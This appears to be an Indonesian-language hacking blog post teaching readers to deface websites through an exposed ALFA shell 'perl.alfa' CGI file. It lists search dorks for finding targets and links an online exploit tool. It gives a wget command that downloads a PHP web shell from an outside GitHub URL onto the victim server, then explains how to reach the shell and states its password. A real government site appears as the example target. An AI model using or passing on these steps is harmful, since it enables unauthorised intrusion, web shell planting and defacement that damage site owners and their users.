Tutorial Deface Poc Alfa RCE perl.alfa

 



Assalamualaikum wr.wb


Kembali lagi bersama saya yang ganteng ini. Kali ini saya akan membagikan Tutorial Deface Poc RCE perl.alfa Upload Shell


Ok tanpa bersendau gurau di awal langsung saja kita siapkan bahannya.




Untuk bahan yang perlu kalian siapkan adalah:



1. Dork 


2. Tools Exploit nya, disini gw make tools dari exploit.my.id

Untuk tools nya buka aja ini url nya:

http://v1.exploits.my.id:1337/?tools=perlalfa 


3. Shell dalam bentuk txt yg di taruh di github / pastebin. Disini saya akan memakai dari github. Link shell yang saya pakai:

https://raw.githubusercontent.com/mrquixter/quixter-ohct/main/qxtrbyp.php


Untuk dork, kalian bisa gunakan:

/alfacgiapi/perl.alfa "2020"

/alfacgiapi/perl.alfa "2021"

/alfacgiapi/perl.alfa "28"

/alfacgiapi/perl.alfa "1"


Kembangin sendiri ga usah manja!


Jika semua bahan sudah siap dan kalian sudah menemukan targetnya, mari kita eksekusi.



Pertama silahkan buka website target dan lihat web nya vuln atau tidak.



Perhatikan!! 

Pertama harus ada file bernama perl.alfa

Jika target kalian sudah file perl.alfa silahkan kalian buka file nya dengan cara klik file tersebut.

Jika tampilannya blank putih, berarti vuln.

Jika file terdownload, not permission, dll. Berarti tidak vuln, silahkan cari website lain.




Ok jika kalian buka web nya dan ternyata vuln, langsung saja buka tools nya yang url nya saya sediakan di atas tadi.



Pada bagian kolom paling atas, silahkan isikan dengan url target kalian. 


Contoh:

https://indonesia.go.id/images/ALFA_DATA/alfacgiapi/perl.alfa





Jika sudah, pada bagian kolom "COMMAND" isikan perintah sebagai berikut:


wget -O quixtergans.php https://raw.githubusercontent.com/mrquixter/quixter-ohct/main/qxtrbyp.php



Contoh:




Jika sudah, langsung saja kalian klik tombol "GASKAN"


Jika shell kalian sukses terupload, maka tampilannya akan seperti ini:



Jika muncul tulisan:

"Command nya salah / web nya kgk vuln nich"


Kemungkinan memang command kalian salah, saran saya kalian copy aja command yang saya kasih di atas. Tinggal copas.




Jika shell sudah sukses terupload, cara aksesnya adalah kalian buka page:

 /ALFA_DATA/alfacgialfa/

nanti shell kalian akan muncul di sana.


Contoh:



Tuh muncul quixtergans.php 

Password shell:

090619


Tinggal kalian buka aja. Gimana? Sangat mudah sekali kan?



Ok sekian dulu tutorial pada kali ini, apabila ada kurang ketika saya menjelaskan, saya mohon maaf. Silahkan tinggalkan komentar kalian ya.




Terimakasih.




#mr.quixter #mrquixter #onehatcyberteam #tutorial #deface #poc #perlalfa #alfarce #hacking 


Komentar

Postingan populer dari blog ini

Cara Unreg Atau Menonaktifkan Nomor All Operator

Tutorial Deface Poc Open Journal System (OJS)